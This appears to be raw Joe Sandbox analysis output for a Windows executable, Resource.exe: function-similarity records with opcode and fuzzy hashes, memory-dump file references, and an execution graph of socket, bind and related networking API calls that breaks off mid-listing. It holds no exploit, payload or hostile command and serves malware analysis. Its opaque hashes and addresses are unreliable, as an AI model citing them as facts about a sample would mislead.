                                                                                                                                                                                                                                                              • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1956198572-0
                                                                                                                                                                                                                                                              • Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                                                              • Instruction ID: 4c4777d36ef8ff94eba5e2d236c1ed59374b99117d55fb7d8d975bf40823bb50
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D11A933E2816243FA54976AF7443791292EF85BC0F588030DE8946B9DCE2FD4C14609
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                              • Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                                                                                                                                                                                                                              • Instruction ID: 5945bfb2ae93e3be633497a303bd8fc37d2732395eb6e2fd038badc1bbb987b7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 07413813A382A242FB348B25D65537A6750EF80BA4F104235EF5E8BADADE3FD441C716
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6E60B95D6
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAF0C: RtlFreeHeap.NTDLL(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF22
                                                                                                                                                                                                                                                                • Part of subcall function 00007FF6E60BAF0C: GetLastError.KERNEL32(?,?,?,00007FF6E60C3392,?,?,?,00007FF6E60C33CF,?,?,00000000,00007FF6E60C3895,?,?,00000000,00007FF6E60C37C7), ref: 00007FF6E60BAF2C
                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6E60ABFE5), ref: 00007FF6E60B95F4
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                              • API String ID: 3580290477-180410116
                                                                                                                                                                                                                                                              • Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                                                                                                                                                                                                                              • Instruction ID: b166d6d0dbfca1a73076ae4f56e3816fb2cd7d7c9ab86d44751dcc47dcb46f55
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93418437A28B3286EB54DF21D6402BC2794EF85784B548035E94E87B89DF3FD8918309
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                              • Opcode ID: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                                                                                                                                                                                                                              • Instruction ID: ab97227035c17614c76ebacd4e4e7ee6e92c931fa68778d22e46e7e6ca3f0a4f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c155d3c2efe6fcc9017d536d5590e74356888db1e245345eaaebbd58f2ba0871
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D741B233A28A9182EB208F65E5443A9A760FB98B94F504031EE4EC7798DF3ED441C755
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                              • Opcode ID: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                                                                                                                                                                                                                              • Instruction ID: 9779077099bc1c81c9a48a6173e7213cc3fde1fef54f3054ff395c134a33a55f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ff0cd5ba2d057391727bad9116619ea0dc18b87a05b7d3f5e4e2c30a93bc506
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F21F033A282A182EB209F15D10436D73A1FB84B88F518036DA8DC7289DF7FE945C74A
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID: Error detected
                                                                                                                                                                                                                                                              • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                              • Opcode ID: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                                                                                                                                                                                                                              • Instruction ID: 3c7612168312b1675a74bfcd92f09ebfb07d43f7fb7f25979816c5f28e8ceaaf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93d1fdc723546ae567f8218d0d5003b65100b09b9274e520b1b2c374812bf196
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1921A17363869691E720DB10F5907EA6364FF847C8F805135E68D87AA9DF3ED205CB09
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                              • String ID: Fatal error detected
                                                                                                                                                                                                                                                              • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                              • Opcode ID: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                                                                                                                                                                                                                              • Instruction ID: 4a1fc1db99ae8f5b07350ad8bbbb5953359d746e0aea2d134d54379dc1e9ade8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63802d79dfeaf9ba572d8d5d5ffec4a1fc362ac500ecb438f71a9def6701a566
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5621A173638A9291E720DB10F5907EA6364FF847C4F805535E68D87AA9DF3ED205CB09
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                              • Opcode ID: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                                                                                                                                                                                                                              • Instruction ID: 8b096633df1376e9c421017d51abba76ce05c766bc263b124d378e899360de77
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 010ed9957d99c3a93ebfd805af8ad73f2bfdfbf7bf3eba5be717857b77bb313e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79115B33628B5182EB60CB15F540369B7E5FB88B84F584234DE8D8B769EF3EC9518B04
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.2488884741.00007FF6E60A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E60A0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488845009.00007FF6E60A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488931103.00007FF6E60CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2488984906.00007FF6E60E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.2489069955.00007FF6E60E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff6e60a0000_Resource.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                              • Opcode ID: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                                                                                                                                                                                                                              • Instruction ID: f160c15780f50461a5f63c90a67caba337f823b03cf8e07b599d233bce92b7c1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d56ef0e9341907a819310a39eb36239c8511962549d77217a4abb3fc68a978d5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9501F76393C22686FB20AF20952137F2390EF54744F404435D54ECA295DF3FE604CA2A

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:2.3%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:1.8%
                                                                                                                                                                                                                                                              Total number of Nodes:973
                                                                                                                                                                                                                                                              Total number of Limit Nodes:161
                                                                                                                                                                                                                                                              execution_graph 111489 7ff8b7e561ec 111492 7ff8b7e56222 111489->111492 111490 7ff8b7e56226 setsockopt 111495 7ff8b7e562ef 111490->111495 111492->111490 111493 7ff8b7e562ae 111492->111493 111494 7ff8b7e5631b setsockopt 111493->111494 111493->111495 111494->111495 111496 7ff8b7e54eac 111501 7ff8b7e54ee6 111496->111501 111498 7ff8b7e54fe4 111530 7ff8b7e52280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 111498->111530 111500 7ff8b7e54ff8 111501->111498 111502 7ff8b7e5500c 111501->111502 111504 7ff8b7e55048 111502->111504 111503 7ff8b7e55094 111505 7ff8b7e55278 111503->111505 111512 7ff8b7e550a8 111503->111512 111504->111503 111506 7ff8b7e55350 111504->111506 111513 7ff8b7e550b2 111504->111513 111511 7ff8b7e552cf getsockname 111505->111511 111505->111513 111509 7ff8b7e5538f WSASocketW 111506->111509 111510 7ff8b7e553ba socket 111506->111510 111508 7ff8b7e550e4 111508->111498 111514 7ff8b7e553ad 111509->111514 111515 7ff8b7e553c3 111509->111515 111510->111515 111516 7ff8b7e552e6 111511->111516 111517 7ff8b7e552f2 111511->111517 111512->111513 111520 7ff8b7e551d9 WSASocketW 111512->111520 111531 7ff8b7e52280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 111513->111531 111514->111510 111519 7ff8b7e55214 111515->111519 111525 7ff8b7e553d6 111515->111525 111522 7ff8b7e5521e 111516->111522 111523 7ff8b7e55311 getsockopt 111516->111523 111518 7ff8b7e552fb WSAGetLastError 111517->111518 111517->111519 111518->111516 111518->111519 111532 7ff8b7e54008 WSAGetLastError 111519->111532 111524 7ff8b7e5520e 111520->111524 111522->111513 111533 7ff8b7e53cc4 111522->111533 111523->111519 111523->111522 111524->111519 111524->111522 111525->111522 111526 7ff8b7e553e6 SetHandleInformation 111525->111526 111526->111522 111528 7ff8b7e55268 111526->111528 111528->111513 111529 7ff8b7e55406 closesocket 111528->111529 111529->111513 111530->111500 111531->111508 111532->111513 111534 7ff8b7e58538 111533->111534 111535 7ff8b7e53cde ioctlsocket 111534->111535 111536 7ff8b7e53d0a 111535->111536 111537 7ff8b7e53d14 111535->111537 111536->111528 111538 7ff8b7e53d1a WSAGetLastError 111537->111538 111538->111536 111539 7ff8a880d749 111540 7ff8a880d767 111539->111540 111541 7ff8a880fa87 111540->111541 111550 7ff8a880d798 111540->111550 111553 7ff8a880d775 111540->111553 111544 7ff8a880faa9 111541->111544 111560 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111541->111560 111542 7ff8a8810046 111562 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111542->111562 111544->111542 111561 7ff8a87ffec0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111544->111561 111547 7ff8a8810098 111548 7ff8a88100aa 111547->111548 111563 7ff8a8803490 37 API calls 111547->111563 111549 7ff8a88100bb 111548->111549 111564 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111548->111564 111556 7ff8a880fb40 111549->111556 111565 7ff8a882e260 6 API calls 111549->111565 111550->111553 111559 7ff8a87e4b60 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111550->111559 111556->111553 111566 7ff8a88fcad0 111556->111566 111558 7ff8a8810159 111559->111550 111560->111544 111561->111542 111562->111547 111563->111548 111564->111549 111565->111556 111567 7ff8a88fcad9 111566->111567 111568 7ff8a88fcb24 IsProcessorFeaturePresent 111567->111568 111569 7ff8a88fcae4 111567->111569 111570 7ff8a88fcb3c 111568->111570 111569->111558 111573 7ff8a88fcd18 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111570->111573 111572 7ff8a88fcb4f 111572->111558 111573->111572 111574 7ff8b7e19128 111575 7ff8b7e1915d 111574->111575 111577 7ff8b7e1916d 111575->111577 111578 7ff8b7e19214 111575->111578 111580 7ff8b7e1924d 111578->111580 111579 7ff8b7e19269 111579->111577 111580->111579 111583 7ff8b7e14720 WSAGetLastError 111580->111583 111584 7ff8b7e14028 111580->111584 111583->111580 111585 7ff8b7e14067 111584->111585 111588 7ff8b7e1405c 111584->111588 111590 7ff8b7e12590 111585->111590 111587 7ff8b7e14107 111587->111580 111588->111585 111589 7ff8b7e140d8 select 111588->111589 111589->111585 111591 7ff8b7e12599 111590->111591 111592 7ff8b7e125a4 111591->111592 111593 7ff8b7e125e4 IsProcessorFeaturePresent 111591->111593 111592->111587 111594 7ff8b7e125fc 111593->111594 111597 7ff8b7e127d8 RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 111594->111597 111596 7ff8b7e1260f 111596->111587 111597->111596 111598 7ff8b7e545e8 111605 7ff8b7e53588 111598->111605 111601 7ff8b7e546a9 111602 7ff8b7e54628 111603 7ff8b7e54658 bind 111602->111603 111604 7ff8b7e5467a 111602->111604 111603->111604 111618 7ff8b7e52280 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 111604->111618 111606 7ff8b7e535b6 111605->111606 111607 7ff8b7e53769 111605->111607 111608 7ff8b7e5364e 111606->111608 111609 7ff8b7e535bf 111606->111609 111610 7ff8b7e535c4 111607->111610 111621 7ff8b7e541c0 8 API calls 111607->111621 111608->111610 111620 7ff8b7e541c0 8 API calls 111608->111620 111609->111610 111619 7ff8b7e540d4 00007FF8C6124340 111609->111619 111610->111602 111613 7ff8b7e53816 111613->111610 111615 7ff8b7e53843 htons 111613->111615 111615->111610 111616 7ff8b7e536ed 111616->111610 111617 7ff8b7e5373a htons htonl 111616->111617 111617->111610 111618->111601 111619->111610 111620->111616 111621->111613 111622 7ff8a87e0180 GetSystemInfo 111623 7ff8a87e01b4 111622->111623 111624 7ff8b8af5f30 111625 7ff8b8af5f4f 111624->111625 111626 7ff8b8af6068 00007FF8C6126A30 111625->111626 111628 7ff8b8af60e0 111625->111628 111627 7ff8b8af6086 00007FF8C6126A30 111626->111627 111626->111628 111627->111628 111629 7ff8b8af60a4 00007FF8C6126A30 111627->111629 111629->111628 111630 7ff8b8af60c2 00007FF8C6126A30 111629->111630 111630->111628 111631 7ff8a9315dc0 111634 7ff8a9315ddf 111631->111634 111633 7ff8a9315f4e 111634->111633 111635 7ff8a92d1280 111634->111635 111635->111633 111636 7ff8a9318a20 111635->111636 111637 7ff8a9318a9e SetLastError 111636->111637 111638 7ff8a9318aed 111636->111638 111637->111636 111637->111638 111638->111633 111639 7ff8a882f890 111642 7ff8a882f8cf 111639->111642 111652 7ff8a882fce7 111639->111652 111641 7ff8a882fbb3 111649 7ff8a882fbdb 111641->111649 111641->111652 111671 7ff8a88256d0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind new[] 111641->111671 111653 7ff8a87d5dc0 111642->111653 111644 7ff8a882fd2e 111645 7ff8a882fd48 111644->111645 111646 7ff8a882fd55 111644->111646 111647 7ff8a87d5dc0 4 API calls 111645->111647 111646->111652 111660 7ff8a87d5e80 111646->111660 111647->111652 111649->111644 111650 7ff8a882fcd3 111649->111650 111672 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111650->111672 111655 7ff8a87d5d80 111653->111655 111654 7ff8a87d5ded 111654->111641 111655->111654 111673 7ff8a87d56a0 111655->111673 111658 7ff8a87d5da5 111658->111641 111661 7ff8a87d5f31 111660->111661 111662 7ff8a87d5e9a 111660->111662 111661->111652 111663 7ff8a87d5f08 111662->111663 111665 7ff8a87d5eac 111662->111665 111683 7ff8a87d5b00 111663->111683 111667 7ff8a87d5dc0 4 API calls 111665->111667 111669 7ff8a87d5eb9 111667->111669 111669->111652 111670 7ff8a87d5f23 111670->111652 111671->111649 111672->111652 111674 7ff8a87d56b9 111673->111674 111675 7ff8a87d5765 111673->111675 111674->111675 111678 7ff8a87d5055 111674->111678 111675->111658 111677 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111675->111677 111677->111658 111680 7ff8a87d5066 111678->111680 111679 7ff8a87d5080 111679->111675 111680->111679 111682 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111680->111682 111682->111679 111684 7ff8a87d5b15 111683->111684 111685 7ff8a87d5b3b 111684->111685 111688 7ff8a87d50b5 111684->111688 111685->111669 111687 7ff8a87d6180 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111685->111687 111687->111670 111690 7ff8a87d50ce 111688->111690 111689 7ff8a87d50f4 111689->111685 111690->111689 111692 7ff8a87d8e10 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111690->111692 111692->111689 111693 7ff8a88303d0 111694 7ff8a8830408 111693->111694 111695 7ff8a883041f 111693->111695 111696 7ff8a8830410 111694->111696 111697 7ff8a8830441 111694->111697 111698 7ff8a883042f 111695->111698 111820 7ff8a881c040 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111695->111820 111819 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111696->111819 111701 7ff8a883044d 111697->111701 111711 7ff8a8830487 111697->111711 111704 7ff8a8830482 111701->111704 111821 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111701->111821 111702 7ff8a8830683 111705 7ff8a883068e 111702->111705 111706 7ff8a88306a2 111702->111706 111704->111702 111710 7ff8a88305c5 111704->111710 111828 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111705->111828 111713 7ff8a88340d0 111706->111713 111823 7ff8a8834050 111710->111823 111711->111704 111822 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111711->111822 111714 7ff8a883415c 111713->111714 111747 7ff8a8834334 111713->111747 111714->111747 111829 7ff8a8851540 111714->111829 111715 7ff8a8835209 111717 7ff8a8835219 111715->111717 111899 7ff8a881c040 00007FF8BFAB19C0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111715->111899 111855 7ff8a8835b80 111717->111855 111722 7ff8a8835226 111724 7ff8a88fcad0 4 API calls 111722->111724 111723 7ff8a8834050 4 API calls 111725 7ff8a883418c 111723->111725 111726 7ff8a883524a 111724->111726 111733 7ff8a8834339 111725->111733 111725->111747 111833 7ff8a882eba0 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111725->111833 111726->111698 111728 7ff8a88341b5 111737 7ff8a88341dc 111728->111737 111728->111747 111862 7ff8a88381f0 44 API calls 111728->111862 111729 7ff8a8834459 111730 7ff8a8834466 111729->111730 111732 7ff8a88344bd 111729->111732 111865 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111730->111865 111734 7ff8a88344ca 111732->111734 111735 7ff8a8834661 111732->111735 111733->111729 111738 7ff8a8834442 111733->111738 111733->111747 111740 7ff8a87d5dc0 4 API calls 111734->111740 111734->111747 111871 7ff8a87d8c40 111735->111871 111737->111737 111834 7ff8a882dd00 111737->111834 111864 7ff8a87d9d60 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 111738->111864 111758 7ff8a88344e7 111740->111758 111744 7ff8a883468e 111745 